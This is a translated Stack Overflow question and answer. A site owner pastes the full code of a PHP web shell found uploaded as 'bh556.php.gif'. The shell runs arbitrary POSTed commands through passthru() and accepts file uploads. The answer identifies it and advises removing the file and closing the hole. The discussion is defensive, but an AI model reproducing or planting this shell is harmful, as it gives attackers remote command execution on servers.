gpt4 book ai didi

php - 可能的网站黑客尝试

转载 作者:可可西里 更新时间:2023-11-01 00:43:01 26 4
gpt4 key购买 nike

我刚刚收到房东发来的热情信息,告诉我......“我们检测到有人试图通过 http 或 ftp 访问您的帐户”

检查恶意文件后,有人上传了一个名为“bh556.php.gif”的图标

打开此文件,它包含以下代码:

<html>
<head>
<div align="left"><font size="1">Input command :</font></div>
<form name="cmd" method="POST" enctype="multipart/form-data">
<input type="text" name="cmd" size="30" class="input"><br>
<pre>
<?php
if ($_POST['cmd']){
$cmd = $_POST['cmd'];
passthru($cmd);
}
?>
</pre>
<hr>
<div align="left"><font size="1">Uploader file :</font></div>

<?php
$uploaded = $_FILES['file']['tmp_name'];
if (file_exists($uploaded)) {
$pwddir = $_POST['dir'];
$real = $_FILES['file']['name'];
$dez = $pwddir."/".$real;
copy($uploaded, $dez);
echo "FILE UPLOADED TO $dez";
}
?> </pre>
<form name="form1" method="post" enctype="multipart/form-data">
<input type="text" name="dir" size="30" value="<? passthru("pwd"); ?>">
<input type="submit" name="submit2" value="Upload">
<input type="file" name="file" size="15">
</td>
</tr>
</table>
</body>
</html>

谁能解释一下如何防止再次通过图标上传,并解释一下上面的代码到底做了什么?

最佳答案

这是一个 PHP Webshel​​l,参见 here获取常见列表。它允许恶意用户通过 PHP 文件执行命令,这具有极大的危害性。

通过标题和一些巧妙的技巧将它们隐藏在图像中很常见,请参阅说明 here

我的建议是,删除文件,解决泄漏的原因,这可能是某种描述的注入(inject)攻击。

关于php - 可能的网站黑客尝试,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/28852904/

26 4 0
Copyright 2021 - 2024 cfsdn All Rights Reserved 蜀ICP备2022000587号
广告合作:1813099741@qq.com 6ren.com